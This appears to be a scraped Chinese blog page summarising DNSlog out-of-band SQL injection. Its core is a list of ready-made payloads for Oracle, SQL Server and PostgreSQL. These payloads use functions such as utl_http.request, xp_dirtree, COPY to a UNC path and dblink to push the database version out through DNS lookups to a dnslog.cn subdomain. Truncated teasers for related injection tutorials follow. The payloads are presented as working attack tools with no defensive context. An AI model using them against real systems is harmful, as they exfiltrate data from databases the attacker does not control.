資料庫dnslog外帶注入-總結
dnslog在sql注入中的實戰
注:外帶資料皆為資料庫版本資訊
條件:條件:適用於聯合注入或堆疊注入
可用函式:
select utl_http.request((select * from v$version)||'.1ndex.dnslog.cn') from sys.dual;select dbms_ldap.init((select * from v$version)||'.1ndex.dnslog.cn',80) from sys.dual;select httpuritype((select * from v$version)||'.1ndex.dnslog.cn').getclob() from sys.dual;select httpuritype((select * from v$version)||'.1ndex.dnslog.cn').getclob() from sys.dual;id=1;declare @host varchar(1024);select @host=(select serverproperty('edition'))%2b'.1ndex.dnslog.cn'; exec('master..xp_dirtree "\'%2b@host%2b'\foobar$"');
id=1;declare @host varchar(1024);select @host=(select serverproperty('edition'))%2b'.1ndex.dnslog.cn'; exec('master..xp_fileexist "\'%2b@host%2b'\foobar$"');
id=1;declare @host varchar(1024);select @host=(select serverproperty('edition'))%2b'.1ndex.dnslog.cn'; exec('master..xp_subdirs "\'%2b@host%2b'\foobar$"');
id=1;drop table if exists table_output; create table table_output(content text); create or replace function temp_function() returns void as $$ declare exec_cmd text; declare query_result text; begin select into query_result (select version()); exec_cmd := e'copy table_output(content) from e\'\\\\\\\\'||query_result||e'.1ndex.dnslog.cn\\\\aaa.txt\''; execute exec_cmd; end; $$ language plpgsql security definer; select temp_function();id=1;create extension dblink;select * from dblink('host='||(select version())||'.1ndex.dnslog.cn username=1ndex password=1ndex','select 1ndex') returns (result text);mysql dns外帶資料庫注入
在進行操作之前 我們要先有乙個網域名稱 這裡簡單的說一下吧 就是我們輸入網域名稱之後 我們的本地網域名稱伺服器會把在自身伺服器裡面查詢是否存在ip位址 如果沒有則傳送到根網域名稱伺服器 如果根網域名稱伺服器裡面有對應的記錄則返回 如果沒有則告訴本地網域名稱伺服器去向頂級網域名稱伺服器查詢 大概就是這...
十七 SQL注入之二次加解密,DNS注入
less 21關,base64進行解密 encode加密decode解密 cookie處注入 判斷加密演算法,然後進行注入 less 24關,先註冊乙個賬戶dudu 假設存在dudu,而後修改密碼dudu 已經閉合,錯誤的執行了,注入語句,將dudu的密碼成功修改 中轉注入 python sqlma...
sql元資料 注入
伺服器元資料 db list mysqli query conn,show databases while db mysqli fetch object db list res 0 mysqli query conn,select version res 1 mysqli query conn,se...